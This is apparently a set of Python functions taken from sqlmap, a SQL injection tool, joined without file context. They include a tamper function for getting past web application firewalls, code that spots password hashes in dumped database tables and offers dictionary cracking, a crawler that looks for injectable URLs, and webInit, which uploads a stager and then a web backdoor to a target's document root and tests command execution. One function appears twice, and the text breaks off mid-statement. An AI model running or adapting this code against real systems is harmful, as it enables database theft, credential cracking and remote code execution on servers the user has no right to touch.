def tamper(payload, **kwargs): """ Adds multiple spaces (' ') around SQL keywords Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt >>> random.seed(0) >>> tamper('1 UNION SELECT foobar') '1 UNION SELECT foobar' """ retVal = payload if payload: words = OrderedSet() for match in re.finditer(r"\b[A-Za-z_]+\b", payload): word = match.group() if word.upper() in kb.keywords: words.add(word) for word in words: retVal = re.sub(r"(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randint(1, 4), word, ' ' * random.randint(1, 4)), retVal) retVal = re.sub(r"(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randint(1, 4), word), retVal) return retVal
def storeHashesToFile(attack_dict): if not attack_dict: return items = OrderedSet() for user, hashes in attack_dict.items(): for hash_ in hashes: hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ if hash_ and hash_ != NULL and hashRecognition(hash_): item = None if user and not user.startswith(DUMMY_USER_PREFIX): item = "%s:%s\n" % (user.encode(UNICODE_ENCODING), hash_.encode(UNICODE_ENCODING)) else: item = "%s\n" % hash_.encode(UNICODE_ENCODING) if item and item not in items: items.add(item) if kb.storeHashesChoice is None: message = "do you want to store hashes to a temporary file " message += "for eventual further processing with other tools [y/N] " kb.storeHashesChoice = readInput(message, default='N', boolean=True) if items and kb.storeHashesChoice: handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.HASHES, suffix=".txt") os.close(handle) infoMsg = "writing hashes to a temporary file '%s' " % filename logger.info(infoMsg) with open(filename, "w+") as f: for item in items: f.write(item)
def parseSitemap(url, retVal=None): global abortedFlag if retVal is not None: logger.debug("parsing sitemap '%s'" % url) try: if retVal is None: abortedFlag = False retVal = OrderedSet() try: content = Request.getPage( url=url, raise404=True)[0] if not abortedFlag else "" except _http_client.InvalidURL: errMsg = "invalid URL given for sitemap ('%s')" % url raise SqlmapSyntaxException(errMsg) for match in re.finditer(r"<loc>\s*([^<]+)", content or ""): if abortedFlag: break url = match.group(1).strip() if url.endswith(".xml") and "sitemap" in url.lower(): if kb.followSitemapRecursion is None: message = "sitemap recursion detected. Do you want to follow? [y/N] " kb.followSitemapRecursion = readInput(message, default='N', boolean=True) if kb.followSitemapRecursion: parseSitemap(url, retVal) else: retVal.add(url) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during sitemap parsing. sqlmap " warnMsg += "will use partial list" logger.warn(warnMsg) return retVal
def parseSitemap(url, retVal=None): global abortedFlag if retVal is not None: logger.debug("parsing sitemap '%s'" % url) try: if retVal is None: abortedFlag = False retVal = OrderedSet() try: content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else "" except _http_client.InvalidURL: errMsg = "invalid URL given for sitemap ('%s')" % url raise SqlmapSyntaxException(errMsg) for match in re.finditer(r"<loc>\s*([^<]+)", content or ""): if abortedFlag: break url = match.group(1).strip() if url.endswith(".xml") and "sitemap" in url.lower(): if kb.followSitemapRecursion is None: message = "sitemap recursion detected. Do you want to follow? [y/N] " kb.followSitemapRecursion = readInput(message, default='N', boolean=True) if kb.followSitemapRecursion: parseSitemap(url, retVal) else: retVal.add(url) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during sitemap parsing. sqlmap " warnMsg += "will use partial list" logger.warn(warnMsg) return retVal
def crawl(target): try: visited = set() threadData = getCurrentThreadData() threadData.shared.value = OrderedSet() threadData.shared.formsFound = False def crawlThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: if threadData.shared.unprocessed: current = threadData.shared.unprocessed.pop() if current in visited: continue elif conf.crawlExclude and re.search(conf.crawlExclude, current): dbgMsg = "skipping '%s'" % current logger.debug(dbgMsg) continue else: visited.add(current) else: break content = None try: if current: content = Request.getPage(url=current, crawling=True, raise404=False)[0] except SqlmapConnectionException as ex: errMsg = "connection exception detected ('%s'). skipping " % getSafeExString(ex) errMsg += "URL '%s'" % current logger.critical(errMsg) except SqlmapSyntaxException: errMsg = "invalid URL detected. skipping '%s'" % current logger.critical(errMsg) except _http_client.InvalidURL as ex: errMsg = "invalid URL detected ('%s'). skipping " % getSafeExString(ex) errMsg += "URL '%s'" % current logger.critical(errMsg) if not kb.threadContinue: break if isinstance(content, six.text_type): try: match = re.search(r"(?si)<html[^>]*>(.+)</html>", content) if match: content = "<html>%s</html>" % match.group(1) soup = BeautifulSoup(content) tags = soup('a') tags += re.finditer(r'(?i)\s(href|src)=["\'](?P<href>[^>"\']+)', content) tags += re.finditer(r'(?i)window\.open\(["\'](?P<href>[^)"\']+)["\']', content) for tag in tags: href = tag.get("href") if hasattr(tag, "get") else tag.group("href") if href: if threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: current = threadData.lastRedirectURL[1] url = _urllib.parse.urljoin(current, htmlUnescape(href)) # flag to know if we are dealing with the same target host _ = checkSameHost(url, target) if conf.scope: if not re.search(conf.scope, url, re.I): continue elif not _: continue if (extractRegexResult(r"\A[^?]+\.(?P<result>\w+)(\?|\Z)", url) or "").lower() not in CRAWL_EXCLUDE_EXTENSIONS: with kb.locks.value: threadData.shared.deeper.add(url) if re.search(r"(.*?)\?(.+)", url) and not re.search(r"\?(v=)?\d+\Z", url) and not re.search(r"(?i)\.(js|css)(\?|\Z)", url): threadData.shared.value.add(url) except UnicodeEncodeError: # for non-HTML files pass except ValueError: # for non-valid links pass finally: if conf.forms: threadData.shared.formsFound |= len(findPageForms(content, current, False, True)) > 0 if conf.verbose in (1, 2): threadData.shared.count += 1 status = '%d/%d links visited (%d%%)' % (threadData.shared.count, threadData.shared.length, round(100.0 * threadData.shared.count / threadData.shared.length)) dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) threadData.shared.deeper = set() threadData.shared.unprocessed = set([target]) if kb.checkSitemap is None: message = "do you want to check for the existence of " message += "site's sitemap(.xml) [y/N] " kb.checkSitemap = readInput(message, default='N', boolean=True) if kb.checkSitemap: found = True items = None url = _urllib.parse.urljoin(target, "/sitemap.xml") try: items = parseSitemap(url) except SqlmapConnectionException as ex: if "page not found" in getSafeExString(ex): found = False logger.warn("'sitemap.xml' not found") except: pass finally: if found: if items: for item in items: if re.search(r"(.*?)\?(.+)", item): threadData.shared.value.add(item) if conf.crawlDepth > 1: threadData.shared.unprocessed.update(items) logger.info("%s links found" % ("no" if not items else len(items))) if not conf.bulkFile: infoMsg = "starting crawler for target URL '%s'" % target logger.info(infoMsg) for i in xrange(conf.crawlDepth): threadData.shared.count = 0 threadData.shared.length = len(threadData.shared.unprocessed) numThreads = min(conf.threads, len(threadData.shared.unprocessed)) if not conf.bulkFile: logger.info("searching for links with depth %d" % (i + 1)) runThreads(numThreads, crawlThread, threadChoice=(i > 0)) clearConsoleLine(True) if threadData.shared.deeper: threadData.shared.unprocessed = set(threadData.shared.deeper) else: break except KeyboardInterrupt: warnMsg = "user aborted during crawling. sqlmap " warnMsg += "will use partial list" logger.warn(warnMsg) finally: clearConsoleLine(True) if not threadData.shared.value: if not (conf.forms and threadData.shared.formsFound): warnMsg = "no usable links found (with GET parameters)" if conf.forms: warnMsg += " or forms" logger.warn(warnMsg) else: for url in threadData.shared.value: kb.targets.add((urldecode(url, kb.pageEncoding), None, None, None, None)) if kb.targets: if kb.normalizeCrawlingChoice is None: message = "do you want to normalize " message += "crawling results [Y/n] " kb.normalizeCrawlingChoice = readInput(message, default='Y', boolean=True) if kb.normalizeCrawlingChoice: seen = set() results = OrderedSet() for target in kb.targets: if target[1] in (HTTPMETHOD.GET, None): match = re.search(r"/[^/?]*\?.*\Z", target[0]) if match: key = re.sub(r"=[^=&]*", "=", match.group(0)).strip('&') if key not in seen: results.add(target) seen.add(key) else: results.add(target) kb.targets = results storeResultsToFile(kb.targets)
def attackDumpedTable(): if kb.data.dumpedTable: table = kb.data.dumpedTable columns = list(table.keys()) count = table["__infos__"]["count"] if not count: return debugMsg = "analyzing table dump for possible password hashes" logger.debug(debugMsg) found = False col_user = '' col_passwords = set() attack_dict = {} binary_fields = OrderedSet() replacements = {} for column in sorted(columns, key=len, reverse=True): if column and column.lower() in COMMON_USER_COLUMNS: col_user = column break for column in columns: if column != "__infos__" and table[column]["values"]: if all(INVALID_UNICODE_CHAR_FORMAT.split('%')[0] in (value or "") for value in table[column]["values"]): binary_fields.add(column) if binary_fields: _ = ','.join(binary_fields) warnMsg = "potential binary fields detected ('%s'). In case of any problems you are " % _ warnMsg += "advised to rerun table dump with '--fresh-queries --binary-fields=\"%s\"'" % _ logger.warn(warnMsg) for i in xrange(count): if not found and i > HASH_RECOGNITION_QUIT_THRESHOLD: break for column in columns: if column == col_user or column == "__infos__": continue if len(table[column]["values"]) <= i: continue if conf.binaryFields and column in conf.binaryFields: continue value = table[column]["values"][i] if column in binary_fields and re.search(HASH_BINARY_COLUMNS_REGEX, column) is not None: previous = value value = encodeHex(getBytes(value), binary=False) replacements[value] = previous if hashRecognition(value): found = True if col_user and i < len(table[col_user]["values"]): if table[col_user]["values"][i] not in attack_dict: attack_dict[table[col_user]["values"][i]] = [] attack_dict[table[col_user]["values"][i]].append(value) else: attack_dict["%s%d" % (DUMMY_USER_PREFIX, i)] = [value] col_passwords.add(column) if attack_dict: infoMsg = "recognized possible password hashes in column%s " % ("s" if len(col_passwords) > 1 else "") infoMsg += "'%s'" % ", ".join(col for col in col_passwords) logger.info(infoMsg) storeHashesToFile(attack_dict) message = "do you want to crack them via a dictionary-based attack? %s" % ("[y/N/q]" if conf.multipleTargets else "[Y/n/q]") choice = readInput(message, default='N' if conf.multipleTargets else 'Y').upper() if choice == 'N': return elif choice == 'Q': raise SqlmapUserQuitException results = dictionaryAttack(attack_dict) lut = dict() for (_, hash_, password) in results: if hash_: key = hash_ if hash_ not in replacements else replacements[hash_] lut[key.lower()] = password lut["0x%s" % key.lower()] = password debugMsg = "post-processing table dump" logger.debug(debugMsg) for i in xrange(count): for column in columns: if not (column == col_user or column == '__infos__' or len(table[column]['values']) <= i): value = table[column]['values'][i] if value and value.lower() in lut: table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()] or HASH_EMPTY_PASSWORD_MARKER)) table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i]))
def main(): """ Main function of sqlmap when running from command line. """ try: dirtyPatches() resolveCrossReferences() checkEnvironment() setPaths(modulePath()) banner() # Store original command line options for possible later restoration args = cmdLineParser() cmdLineOptions.update( args.__dict__ if hasattr(args, "__dict__") else args) initOptions(cmdLineOptions) if checkPipedInput(): conf.batch = True if conf.get("api"): # heavy imports from lib.utils.api import StdDbOut from lib.utils.api import setRestAPILog # Overwrite system standard output and standard error to write # to an IPC database sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") setRestAPILog() conf.showTime = True dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) dataToStdout("[*] starting @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) init() if not conf.updateAll: # Postponed imports (faster start) if conf.smokeTest: from lib.core.testing import smokeTest os._exitcode = 1 - (smokeTest() or 0) elif conf.vulnTest: from lib.core.testing import vulnTest os._exitcode = 1 - (vulnTest() or 0) else: from lib.controller.controller import start if conf.profile: from lib.core.profiling import profile globals()["start"] = start profile() else: try: if conf.crawlDepth and conf.bulkFile: targets = getFileItems(conf.bulkFile) for i in xrange(len(targets)): target = None try: kb.targets = OrderedSet() target = targets[i] if not re.search(r"(?i)\Ahttp[s]*://", target): target = "http://%s" % target infoMsg = "starting crawler for target URL '%s' (%d/%d)" % ( target, i + 1, len(targets)) logger.info(infoMsg) crawl(target) except Exception as ex: if target and not isinstance( ex, SqlmapUserQuitException): errMsg = "problem occurred while crawling '%s' ('%s')" % ( target, getSafeExString(ex)) logger.error(errMsg) else: raise else: if kb.targets: start() else: start() except Exception as ex: os._exitcode = 1 if "can't start new thread" in getSafeExString(ex): errMsg = "unable to start new threads. Please check OS (u)limits" logger.critical(errMsg) raise SystemExit else: raise except SqlmapUserQuitException: if not conf.batch: errMsg = "user quit" logger.error(errMsg) except (SqlmapSilentQuitException, bdb.BdbQuit): pass except SqlmapShellQuitException: cmdLineOptions.sqlmapShell = False except SqlmapBaseException as ex: errMsg = getSafeExString(ex) logger.critical(errMsg) os._exitcode = 1 raise SystemExit except KeyboardInterrupt: print() except EOFError: print() errMsg = "exit" logger.error(errMsg) except SystemExit as ex: os._exitcode = ex.code or 0 except: print() errMsg = unhandledExceptionMessage() excMsg = traceback.format_exc() valid = checkIntegrity() os._exitcode = 255 if any(_ in excMsg for _ in ("MemoryError", "Cannot allocate memory")): errMsg = "memory exhaustion detected" logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded", "Disk full while accessing")): errMsg = "no space left on output device" logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("The paging file is too small", )): errMsg = "no space left for paging file" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("Access is denied", "subprocess", "metasploit")): errMsg = "permission error occurred while running Metasploit" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("Permission denied", "metasploit")): errMsg = "permission error occurred while using Metasploit" logger.critical(errMsg) raise SystemExit elif "Read-only file system" in excMsg: errMsg = "output device is mounted as read-only" logger.critical(errMsg) raise SystemExit elif "Insufficient system resources" in excMsg: errMsg = "resource exhaustion detected" logger.critical(errMsg) raise SystemExit elif "OperationalError: disk I/O error" in excMsg: errMsg = "I/O error on output device" logger.critical(errMsg) raise SystemExit elif "Violation of BIDI" in excMsg: errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)" logger.critical(errMsg) raise SystemExit elif "Invalid IPv6 URL" in excMsg: errMsg = "invalid URL ('%s')" % excMsg.strip().split('\n')[-1] logger.critical(errMsg) raise SystemExit elif "_mkstemp_inner" in excMsg: errMsg = "there has been a problem while accessing temporary files" logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("tempfile.mkdtemp", "tempfile.mkstemp", "tempfile.py")): errMsg = "unable to write to the temporary directory '%s'. " % tempfile.gettempdir( ) errMsg += "Please make sure that your disk is not full and " errMsg += "that you have sufficient write permissions to " errMsg += "create temporary files and/or directories" logger.critical(errMsg) raise SystemExit elif "Permission denied: '" in excMsg: match = re.search(r"Permission denied: '([^']*)", excMsg) errMsg = "permission error occurred while accessing file '%s'" % match.group( 1) logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) " errMsg += "(Reference: 'https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe')" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")): errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) " errMsg += "(Reference: 'https://github.com/PyMySQL/PyMySQL/issues/700')" logger.critical(errMsg) raise SystemExit elif "must be pinned buffer, not bytearray" in excMsg: errMsg = "error occurred at Python interpreter which " errMsg += "is fixed in 2.7. Please update accordingly " errMsg += "(Reference: 'https://bugs.python.org/issue8104')" logger.critical(errMsg) raise SystemExit elif "hash_randomization" in excMsg: errMsg = "error occurred at Python interpreter which " errMsg += "is fixed in 2.7.3. Please update accordingly " errMsg += "(Reference: 'https://docs.python.org/2/library/sys.html')" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("Resource temporarily unavailable", "os.fork()", "dictionaryAttack")): errMsg = "there has been a problem while running the multiprocessing hash cracking. " errMsg += "Please rerun with option '--threads=1'" logger.critical(errMsg) raise SystemExit elif "can't start new thread" in excMsg: errMsg = "there has been a problem while creating new thread instance. " errMsg += "Please make sure that you are not running too many processes" if not IS_WIN: errMsg += " (or increase the 'ulimit -u' value)" logger.critical(errMsg) raise SystemExit elif "can't allocate read lock" in excMsg: errMsg = "there has been a problem in regular socket operation " errMsg += "('%s')" % excMsg.strip().split('\n')[-1] logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("pymysql", "configparser")): errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("ntlm", "socket.error, err", "SyntaxError")): errMsg = "wrong initialization of python-ntlm detected (using Python2 syntax)" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("drda", "to_bytes")): errMsg = "wrong initialization of drda detected (using Python3 syntax)" logger.critical(errMsg) raise SystemExit elif "'WebSocket' object has no attribute 'status'" in excMsg: errMsg = "wrong websocket library detected" errMsg += " (Reference: 'https://github.com/sqlmapproject/sqlmap/issues/4572#issuecomment-775041086')" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("window = tkinter.Tk()", )): errMsg = "there has been a problem in initialization of GUI interface " errMsg += "('%s')" % excMsg.strip().split('\n')[-1] logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("unable to access item 'liveTest'", )): errMsg = "detected usage of files from different versions of sqlmap" logger.critical(errMsg) raise SystemExit elif kb.get("dumpKeyboardInterrupt"): raise SystemExit elif any(_ in excMsg for _ in ("Broken pipe", )): raise SystemExit elif valid is False: errMsg = "code integrity check failed (turning off automatic issue creation). " errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.critical(errMsg) print() dataToStdout(excMsg) raise SystemExit elif any(_ in excMsg for _ in ("tamper/", "waf/")): logger.critical(errMsg) print() dataToStdout(excMsg) raise SystemExit elif any(_ in excMsg for _ in ("ImportError", "ModuleNotFoundError", "Can't find file for module", "SAXReaderNotAvailable", "source code string cannot contain null bytes", "No module named", "tp_name field")): errMsg = "invalid runtime environment ('%s')" % excMsg.split( "Error: ")[-1].strip() logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("SyntaxError: Non-ASCII character", ".py on line", "but no encoding declared")): errMsg = "invalid runtime environment ('%s')" % excMsg.split( "Error: ")[-1].strip() logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("No such file", "_'")): errMsg = "corrupted installation detected ('%s'). " % excMsg.strip( ).split('\n')[-1] errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("No such file", "sqlmap.conf", "Test")): errMsg = "you are trying to run (hidden) development tests inside the production environment" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("HTTPNtlmAuthHandler", "'str' object has no attribute 'decode'")): errMsg = "package 'python-ntlm' has a known compatibility issue with the " errMsg += "Python 3 (Reference: 'https://github.com/mullender/python-ntlm/pull/61')" logger.critical(errMsg) raise SystemExit elif "'DictObject' object has no attribute '" in excMsg and all( _ in errMsg for _ in ("(fingerprinted)", "(identified)")): errMsg = "there has been a problem in enumeration. " errMsg += "Because of a considerable chance of false-positive case " errMsg += "you are advised to rerun with switch '--flush-session'" logger.critical(errMsg) raise SystemExit elif "AttributeError: 'module' object has no attribute 'F_GETFD'" in excMsg: errMsg = "invalid runtime (\"%s\") " % excMsg.split( "Error: ")[-1].strip() errMsg += "(Reference: 'https://stackoverflow.com/a/38841364' & 'https://bugs.python.org/issue24944#msg249231')" logger.critical(errMsg) raise SystemExit elif "bad marshal data (unknown type code)" in excMsg: match = re.search(r"\s*(.+)\s+ValueError", excMsg) errMsg = "one of your .pyc files are corrupted%s" % ( " ('%s')" % match.group(1) if match else "") errMsg += ". Please delete .pyc files on your system to fix the problem" logger.critical(errMsg) raise SystemExit for match in re.finditer(r'File "(.+?)", line', excMsg): file_ = match.group(1) try: file_ = os.path.relpath(file_, os.path.dirname(__file__)) except ValueError: pass file_ = file_.replace("\\", '/') if "../" in file_: file_ = re.sub(r"(\.\./)+", '/', file_) else: file_ = file_.lstrip('/') file_ = re.sub(r"/{2,}", '/', file_) excMsg = excMsg.replace(match.group(1), file_) errMsg = maskSensitiveData(errMsg) excMsg = maskSensitiveData(excMsg) if conf.get("api") or not valid: logger.critical("%s\n%s" % (errMsg, excMsg)) else: logger.critical(errMsg) dataToStdout("%s\n" % setColor(excMsg.strip(), level=logging.CRITICAL)) createGithubIssue(errMsg, excMsg) finally: kb.threadContinue = False if getDaysFromLastUpdate() > LAST_UPDATE_NAGGING_DAYS: warnMsg = "your sqlmap version is outdated" logger.warn(warnMsg) if conf.get("showTime"): dataToStdout("\n[*] ending @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) kb.threadException = True if kb.get("tempDir"): for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY): for filepath in glob.glob( os.path.join(kb.tempDir, "%s*" % prefix)): try: os.remove(filepath) except OSError: pass if not filterNone( filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any( filepath.endswith(_) for _ in (".lock", ".exe", ".so", '_'))): # ignore junk files try: shutil.rmtree(kb.tempDir, ignore_errors=True) except OSError: pass if conf.get("hashDB"): conf.hashDB.flush(True) conf.hashDB.close() # NOTE: because of PyPy if conf.get("harFile"): try: with openFile(conf.harFile, "w+b") as f: json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': ')) except SqlmapBaseException as ex: errMsg = getSafeExString(ex) logger.critical(errMsg) if conf.get("api"): conf.databaseCursor.disconnect() if conf.get("dumper"): conf.dumper.flush() # short delay for thread finalization _ = time.time() while threading.active_count() > 1 and ( time.time() - _) > THREAD_FINALIZATION_TIMEOUT: time.sleep(0.01) if cmdLineOptions.get("sqlmapShell"): cmdLineOptions.clear() conf.clear() kb.clear() conf.disableBanner = True main()
def webInit(self): """ This method is used to write a web backdoor (agent) on a writable remote directory within the web server document root. """ if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webPlatform is not None: return self.checkDbmsOs() default = None choices = list(getPublicTypeMembers(WEB_PLATFORM, True)) for ext in choices: if conf.url.endswith(ext): default = ext break if not default: default = WEB_PLATFORM.ASP if Backend.isOs( OS.WINDOWS) else WEB_PLATFORM.PHP message = "which web application language does the web server " message += "support?\n" for count in xrange(len(choices)): ext = choices[count] message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else "")) if default == ext: default = count + 1 message = message[:-1] while True: choice = readInput(message, default=str(default)) if not choice.isdigit(): logger.warn("invalid value, only digits are allowed") elif int(choice) < 1 or int(choice) > len(choices): logger.warn("invalid value, it must be between 1 and %d" % len(choices)) else: self.webPlatform = choices[int(choice) - 1] break if not kb.absFilePaths: message = "do you want sqlmap to further try to " message += "provoke the full path disclosure? [Y/n] " if readInput(message, default='Y', boolean=True): headers = {} been = set([conf.url]) for match in re.finditer( r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I): url = "%s%s" % (conf.url.replace( conf.path, match.group(4)), "wp-content/wp-db.php") if url not in been: try: page, _, _ = Request.getPage(url=url, raise404=False, silent=True) parseFilePaths(page) except: pass finally: been.add(url) url = re.sub(r"(\.\w+)\Z", r"~\g<1>", conf.url) if url not in been: try: page, _, _ = Request.getPage(url=url, raise404=False, silent=True) parseFilePaths(page) except: pass finally: been.add(url) for place in (PLACE.GET, PLACE.POST): if place in conf.parameters: value = re.sub(r"(\A|&)(\w+)=", r"\g<2>[]=", conf.parameters[place]) if "[]" in value: page, headers, _ = Request.queryPage( value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False) parseFilePaths(page) cookie = None if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] elif headers and HTTP_HEADER.SET_COOKIE in headers: cookie = headers[HTTP_HEADER.SET_COOKIE] if cookie: value = re.sub( r"(\A|;)(\w+)=[^;]*", r"\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie) if value != cookie: page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) parseFilePaths(page) value = re.sub(r"(\A|;)(\w+)=[^;]*", r"\g<2>=", cookie) if value != cookie: page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) parseFilePaths(page) directories = list(arrayizeValue(getManualDirectories())) directories.extend(getAutoDirectories()) directories = list(OrderedSet(directories)) path = _urllib.parse.urlparse(conf.url).path or '/' path = re.sub(r"/[^/]*\.\w+\Z", '/', path) if path != '/': _ = [] for directory in directories: _.append(directory) if not directory.endswith(path): _.append("%s/%s" % (directory.rstrip('/'), path.strip('/'))) directories = _ backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webPlatform) backdoorContent = getText( decloak( os.path.join(paths.SQLMAP_SHELL_PATH, "backdoors", "backdoor.%s_" % self.webPlatform))) stagerContent = getText( decloak( os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform))) for directory in directories: if not directory: continue stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform) self.webStagerFilePath = posixpath.join( ntToPosixSlashes(directory), stagerName) uploaded = False directory = ntToPosixSlashes(normalizePath(directory)) if not isWindowsDriveLetterPath( directory) and not directory.startswith('/'): directory = "/%s" % directory if not directory.endswith('/'): directory += '/' # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method infoMsg = "trying to upload the file stager on '%s' " % directory infoMsg += "via LIMIT 'LINES TERMINATED BY' method" logger.info(infoMsg) self._webFileInject(stagerContent, stagerName, directory) for match in re.finditer('/', directory): self.webBaseUrl = "%s://%s:%d%s/" % ( conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) self.webStagerUrl = _urllib.parse.urljoin( self.webBaseUrl, stagerName) debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl logger.debug(debugMsg) uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) uplPage = uplPage or "" if "sqlmap file uploader" in uplPage: uploaded = True break # Fall-back to UNION queries file upload method if not uploaded: warnMsg = "unable to upload the file stager " warnMsg += "on '%s'" % directory singleTimeWarnMessage(warnMsg) if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): infoMsg = "trying to upload the file stager on '%s' " % directory infoMsg += "via UNION method" logger.info(infoMsg) stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform) self.webStagerFilePath = posixpath.join( ntToPosixSlashes(directory), stagerName) handle, filename = tempfile.mkstemp() os.close(handle) with openFile(filename, "w+b") as f: _ = getText( decloak( os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform))) _ = _.replace( SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) f.write(_) self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True) for match in re.finditer('/', directory): self.webBaseUrl = "%s://%s:%d%s/" % ( conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) self.webStagerUrl = _urllib.parse.urljoin( self.webBaseUrl, stagerName) debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl logger.debug(debugMsg) uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) uplPage = uplPage or "" if "sqlmap file uploader" in uplPage: uploaded = True break if not uploaded: continue if "<%" in uplPage or "<?" in uplPage: warnMsg = "file stager uploaded on '%s', " % directory warnMsg += "but not dynamically interpreted" logger.warn(warnMsg) continue elif self.webPlatform == WEB_PLATFORM.ASPX: kb.data.__EVENTVALIDATION = extractRegexResult( EVENTVALIDATION_REGEX, uplPage) kb.data.__VIEWSTATE = extractRegexResult( VIEWSTATE_REGEX, uplPage) infoMsg = "the file stager has been successfully uploaded " infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl) logger.info(infoMsg) if self.webPlatform == WEB_PLATFORM.ASP: match = re.search( r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage) if match: backdoorDirectory = match.group(1) else: continue _ = "tmpe%s.exe" % randomStr(lowercase=True) if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace( SHELL_WRITABLE_DIR_TAG, backdoorDirectory).replace( SHELL_RUNCMD_EXE_TAG, _)): self.webUpload(_, backdoorDirectory, filepath=os.path.join( paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_")) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = backdoorDirectory else: continue else: if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent): warnMsg = "backdoor has not been successfully uploaded " warnMsg += "through the file stager possibly because " warnMsg += "the user running the web server process " warnMsg += "has not write privileges over the folder " warnMsg += "where the user running the DBMS process " warnMsg += "was able to upload the file stager or " warnMsg += "because the DBMS and web server sit on " warnMsg += "different servers" logger.warn(warnMsg) message = "do you want to try the same method used " message += "for the file stager? [Y/n] " if readInput(message, default='Y', boolean=True): self._webFileInject(backdoorContent, backdoorName, directory) else: continue self.webBackdoorUrl = posixpath.join( ntToPosixSlashes(self.webBaseUrl), backdoorName) self.webDirectory = directory self.webBackdoorFilePath = posixpath.join( ntToPosixSlashes(directory), backdoorName) testStr = "command execution test" output = self.webBackdoorRunCmd("echo %s" % testStr) if output == "0": warnMsg = "the backdoor has been uploaded but required privileges " warnMsg += "for running the system commands are missing" raise SqlmapNoneDataException(warnMsg) elif output and testStr in output: infoMsg = "the backdoor has been successfully " else: infoMsg = "the backdoor has probably been successfully " 